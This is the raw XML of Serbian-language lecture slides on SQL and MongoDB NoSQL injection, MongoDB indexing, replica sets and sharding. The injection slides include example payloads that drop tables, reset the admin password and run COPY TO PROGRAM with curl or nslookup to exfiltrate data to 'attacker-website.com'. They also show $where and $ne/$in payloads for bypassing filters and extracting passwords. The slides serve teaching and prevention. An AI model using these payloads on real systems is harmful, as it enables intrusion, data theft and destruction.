              <a:t>COPY … FROM PROGRAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sintakse koja se koristi radi kopiranja podataka u zadatu tabelu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Primer payload-a koji koristi HTTP protokol može biti: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'; COPY users TO PROGRAM 'curl -X POST http://attacker-website.com/ --data-binary “@whoami”';--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Primer payload-a koji koristi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> DNS protokol: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'; COPY users TO PROGRAM 'nslookup $(whoami).attacker-website.com';--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Non-clustered indeksi i Clustered Collections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Od verzije 5.3, MongoDB uvodi pojam </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Clustered Collections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, kolekcije koje ne odvajaju indeks od dokumenata i sortiraju ih po </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> polju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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>od Clustered kolekcija se izvršava samo jedna operacija, što dovodi do boljih performansi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 obzirom da su podaci sortirani, performanse su bolje i kod upita koji zahtevaju pretragu sukcesivnih dokumenata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Moguće je kreirati samo jedan Clustered index u okviru kolekcije jer je podatke moguće sortirati samo po jednom kriterijumu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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-6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Napadi sa ciljem manipulacije baze podataka</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="400800"/>
            <a:ext cx="8520600" cy="47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Modifikacija podataka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Korišćenje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ili </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>ALTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> naredbi da bi se promenili postojeći podaci ili struktura tabela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' OR 1=1; UPDATE users SET password='newpassword' WHERE username='admin'; --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Brisanje podataka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Korišćenje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ili </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>naredbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> za uklanjanje podataka ili čitavih tabela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' OR 1=1; DROP TABLE messages; –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Uspešnost ovakvih napada zavisi od faktora kao što su privilegije korisnika baze podataka, konfiguracije same aplikacije i ograničenja definisanih u šemi baze podataka. Takođe, pojedini tipovi baza podataka zahtevaju korišćenje specifične sintakse ili podešavanja kako bi podržale upite koji sadrže više izraza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Remote Code Execution (RCE) preko SQLi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Google Shape;502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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>apad koji omogućuje napadaču da pokreće proizvoljne komande ili kod na ranjivom sistemu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Korišćenje SQLi kao osnovu za eskalaciju napada i efekte koji se ne ograničavaju samo na bazu podataka, već potencijalno i na sistem na kome se ona nalazi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Korišćenje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>COPY … FROM PROGRAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> sintakse:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Google Shape;50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25" y="3311900"/>
            <a:ext cx="7917326" cy="8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NoSQL Injection (NoSQLi) napadi - Podela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Syntax Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - cilj je umetnuti payload tako da se naruši sintaksa originalnog upita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Otkrivanje vrednosti atributa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Time-based napadi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Operator Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - korišćenje NoSQL operatora u cilju manipulacije originalnog upita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Primeri dati za </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>MongoDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bazu podataka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Syntax Injection - Testiranje sistema na postojanje potencijalnih NoSQLi ranjivosti </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p85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Testiranje sistema na postojanje potencijalnih NoSQLi ranjivosti korišćenjem specijalnih karaktera i stringova u cilju izazivanja greške ili otkrivanja atipičnog ponašanja sistema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Upit:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.products.find({ $where: "this.category == '${input}' </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>					&amp;&amp; this.released == 1" })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Rezultat unosa karaktera </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="516" name="Google Shape;51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550" y="3235150"/>
            <a:ext cx="6844900" cy="15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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="430950"/>
            <a:ext cx="88323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Cilj je zaobići </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>this.released == 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>uslov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Primer payload-a: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>fizzy' || this.released == 0 || 'a'=='b</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>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Rezultujući upit:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>{ "$where": "this.category == 'fizzy' || this.released == 0 || 'a'=='b' &amp;&amp; this.released == 1" }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Najpre se vrši evaluacija uslova </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>'a'=='b' &amp;&amp; this.released == 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>false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Zatim se vrši short-circuiting preostalih uslova: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>this.category == 'fizzy' || this.released == 0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Ukoliko je prvi uslov ispunjen, neće se evaluirati drugi uslov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Drugi uslov se evaluira u slučaju da prvi nije ispunjen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Kao rezultat će biti prikazani svi produkti kojima je naziv kategorije jednak </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>fizzy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i produkti iz ostalih kategorija kojima je atribut released jednak vrednosti </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr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426" y="247275"/>
            <a:ext cx="6331149" cy="464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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="259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Syntax Injection - a. Otkrivanje vrednosti atributa</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Google Shape;533;p88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Osim zaobilaženja logike upita, mogu se ustanoviti i vrednosti atributa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Primer upita: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>{ "$where": "this.username == '&lt;unos&gt;'" }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Otkrivanje prvog karaktera lozinke korišćenjem payload-a:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>admin' &amp;&amp; this.password[0] == 'A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Rezultujući upit:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>{ "$where": "this.username == 'admin' &amp;&amp; this.password[0] == 'A'" }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712" y="2862448"/>
            <a:ext cx="6364575" cy="21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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="339500"/>
            <a:ext cx="8520600" cy="46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Korišćenje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> payload-a:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>admin' &amp;&amp; this.password[0] == 'a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Rezultujući upit:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>{ "$where": "this.username == 'admin' &amp;&amp; this.password[0] == 'a'" }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0" name="Google Shape;54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088" y="1892425"/>
            <a:ext cx="5123825" cy="27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Syntax Injection - b. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Time-based napadi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546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 MongoDB-u p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>osebnu opasnost predstavlja </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>$where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> operator jer omogućuje izvršavanje JavaScript koda pored evaluacije upita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Ovo znači da napadač može iskoristiti JavaScript funkcionalnost dostupnu u MongoDB okruženju kako bi izvršio blokirajuću operaciju, kao što je poziv funkcije koja izaziva kašnjenje, samo ukoliko je zadat uslov tačan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Praćenjem vremena odgovora aplikacije napadač može zaključiti tačnost uslova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Syntax Injection - b. Time-based napadi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552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Primer payload-a:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>admin' + function(x){                </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>	if (x.password[0] === 'a') { sleep(5000); }    </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>}(this) + '     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Kao rezultat, server će odgovoriti sa kašnjenjem samo ukoliko je prvi karakter administratorske lozinke jednak vrednosti </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   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Tipovi indeksa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Single Field indeksi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Compound indeksi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Multikey indeksi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Wildcard indeksi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Geospatial (2d, 2dsphere) indeksi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Hashed indeksi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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="250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 Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="997650"/>
            <a:ext cx="8520600" cy="41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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oguće je izvršiti i umetanje MongoDB-specifičnih operatora kao što su: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$where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - kojim se definiše uslov za izdvajanje dokumenta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$ne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - kojim se definiše nejednakost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$in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- kojim se definiše niz mogućih vrednosti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$regex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- kojim se izdvajaju dokumenta čija se vrednost atributa poklapa sa definisanim regex izrazom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Primer regularnog upita:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.users.findOne({ "username": "user1", "password": "user123" })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Primer payload-a:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.users.findOne({ "username": "user1", "password": { "$ne": "" } })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Kao posledica će biti vraćen dokument koji se odnosi na korisnika čije je korisničko ime jednako user1 i čija lozinka nije jednaka praznom stringu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3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Primer korišćenja </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>$in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> operatora unutar payload-a:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.users.findOne(                                </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>	{                                           </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>	    "username": { "$in": [ "admin", "administrator", "superadmin" ] },</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>	    "password": { "$ne": "" }                         </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>	})    </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Google Shape;564;p9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Operator Injection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38" y="2712425"/>
            <a:ext cx="8354925" cy="21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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-45900" y="985850"/>
            <a:ext cx="92358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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>orišćenje parametrizovanih upita čime se vrši razdvajanje (No)SQL koda od podataka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Stroga validacija korisničkog unosa i odbacivanje ugnježdenih objekata, nizova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ili neočekivanih polja koja bi mogla sadržati operatore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Korišćenje </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>whitelists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Views </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- organičavaju vidljivost određenih kolona ili vrsta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Stored Procedures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- uz pomoć kojih se unapred definišu dozvoljene operacije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 slučaju MongoDB baze podataka, jedan od ključnih mehanizama zaštite je onemogućavanje izvršavanja JavaScript koda u okviru operatora kao što je </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>$where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> navođenjem </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>--noscripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> opcije unutar MongoDB konfiguracije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Konekcije ka bazi podataka treba konfigurisati sa korisničkim nalozima koji poseduju minimalne privilegije neophodne za izvršavanje operacija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Implementiranje log-ovanja radi detekcije neobičnih upita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94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="144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Prevencija SQLi i NoSQLi napada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High Availability kod MongoDB baze podataka</a:t>
            </a:r>
            <a:endParaRPr b="1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Sadržaj</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582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Mehanizmi za dostizanje High Availability u MongoDB-u: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Replica Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - grupa </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> procesa koji održavaju isti skup podataka i predstavljaju sredstvo za dostizanje redundanse i HA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Sharding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- omogućuje horizontalno particionisanje podataka, gde se podaci raspodeljuju na više servera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Praktični primeri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 Sets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Google Shape;588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Primary, Secondary, Arbiter čvorovi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Election proces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Oplog i sinhronizacija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Operacije upisa i čitanja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Write Concern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Read Concern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Read Preference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Primary, Secondary, Arbiter čvorovi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Primarni čvor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- jedini koji preuzima sve operacije upisa i beleži sve izmene nad svojim skupom podataka unutar strukture koja se naziva </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>oplog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. Podrazumevano izvršava i sve operacije čitanja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 Replica Set-u može postojati samo jedan primarni čvor. Ukoliko on nije dostupan, pokreće se Election proces za odabir novog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Sekundarni čvorovi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- sadrže kopije skupa podataka primarnog servera korišćenjem oplog strukture primarnog čvora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Čvorovi arbitri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- ne sadrže kopije podataka, već učestvuju u procesu selekcije novog primarnog čvora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Election proces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 selekcije novog primarnog čvora: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kada originalni primarni čvor prestane sa radom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 dodavanju novog čvora u Replica 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 p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>okretanju Maintenance procesa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prilikom particionisanja mreže, kvara koji deli distribuirani sistem na particije tako da čvorovi u jednoj particiji ne mogu komunicirati sa čvorovima iz druge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kada sekundarni čvorovi ne dobiju Heartbeat signal od primarnog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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rilikom evaluacije kandidata, algoritam obično prioritizuje one čvorove sa većom vrednošću Priority polja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Moguće je odabrati novi primarni čvor samo ukoliko da je većina čvorova iz Replica Set-a koji mogu glasati dostupna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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="194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Oplog i sinhronizacija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00"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="833200"/>
            <a:ext cx="8520600" cy="4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Oplog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Operations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) - struktura u kojoj se čuva hronološki zapis svih operacija koje menjaju podatke u bazi podataka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Primarni čvor izvršava operacije i beleži ih u svoj oplog, zajedno sa jedinstvenom </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>term</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> vrednošću dobijenom nakon Election procesa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Sekundarni čvorovi zatim asinhrono preuzimaju i primenjuju te zapise kako bi se postigla konzistentnost podataka u okviru Replica Set-a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Svaki čvor Replica Set-a održava sopstvenu kopiju oplog-a i periodično razmenjuje Heartbeat signale sa ostalim čvorovima radi detekcije stanja i sinhronizacije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MongoDB koristi dva tipa </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>sinhronizacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> podataka: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Initial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Sync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Kopira sve podatke sa izabranog čvora Replica Set-a na novi čvor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Replication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Nakon inicijalne sinhronizacije, čvorovi vrše replikaciju podataka sa izabranog čvora korišćenjem oplog-a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Operacije upisa i čitanja</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p101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Write Concern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- nivo potvrde koji MongoDB zahteva od Replica Set-a pre nego što operaciju upisa smatra uspešnom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utiče na balans između pouzdanosti podataka i performansi sistema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veći nivo Write Concern-a pruža veću sigurnost da neće doći do gubitka podataka u slučaju prestanka rada nekog čvora, ali uvodi dodatnu latenciju jer zahteva potvrdu od više čvorova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Read Concern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- definiše kada je moguće čitati podatke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utiče na balans između dostupnosti i konzistentnosti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moguće je podesiti tako da se operacije čitanja izvršavaju čak i ako podaci nisu sinhronizovani na svim replikama, ili tek nakon što su svi članovi Replica Set-a dobili sve promene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Read Preference	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - određuje kom čvoru će se proslediti zahtev za čitanjem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podrazumevano ponašanje je da primarni čvor obrađuje sve operacije čitanja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preostale opcije mogu vratiti zastarele podatke prilikom čitanja s obzirom da se replikacija izvršava asinhrono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Single Field indeksi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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Osnovni tip indeksa u MongoDB-u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Definišu indeks nad jednim poljem (atributom) u kolekciji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Primer:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> broj indeksa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>u kolekciji studenti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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764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Sharding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Google Shape;618;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="572700"/>
            <a:ext cx="8520600" cy="42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odatan mehanizam kojim se postiže High Availability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Omogućuje horizontalno particionisanje podataka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Svaki server naziva </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Shard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, a ceo sistem </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Sharded cluster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Particionisanje se vrši na osnovu vrednosti ključa, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Shard key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MongoDB vrši podelu svih postojećih vrednosti Shard ključeva u nepreklapajuće opsege ili heširane vrednosti Shard ključeva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Komponente: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Shards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - serveri od kojih svaki sadrži podskup podataka. Svaki Shard predstavlja Replica Set jer sadrži i replike u pozadini, što znači da pruža redundansu i visoku dostupnost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Config serveri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- čuvaju metapodatke, tj. koji opseg ključeva ili heš ide u koji Shard, kao i konfiguraciju klastera. Kao i sami Shard-ovi, predstavljaju Replica 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Mongos instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - komponente koje imaju ulogu rutiranja (korišćenjem metapodatka sa Config servera) klijentskih upita na odgovarajuće Shard-ove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Ukoliko se prilikom operacija koristi Shard Key, mongos instance mogu proslediti operacije na adekvatan Shard. Alternativa je broadcast pristup (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>scatter/gather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Praktični primeri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Demonstracija Failover procesa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Operacije čitanja i upisa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Testiranje Write Concern i Read Preference svojstava</a:t>
            </a:r>
            <a:endParaRPr baseline="300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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="8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Demonstracija Failover procesa - primer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Google Shape;630;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="723425"/>
            <a:ext cx="8520600" cy="4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Replica Set koji sadrži pet čvorova (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo5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Dodeljeni prioriteti </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>svima osim</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>čvoru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, kome je prioritet </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>2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electionCandidateMetrics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>struktura nakon prvog procesa selekcije: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1" name="Google Shape;63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313" y="1956725"/>
            <a:ext cx="6799376" cy="31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Demonstracija Failover procesa - primer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Iskorišćena </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>rs.stepDown()</a:t>
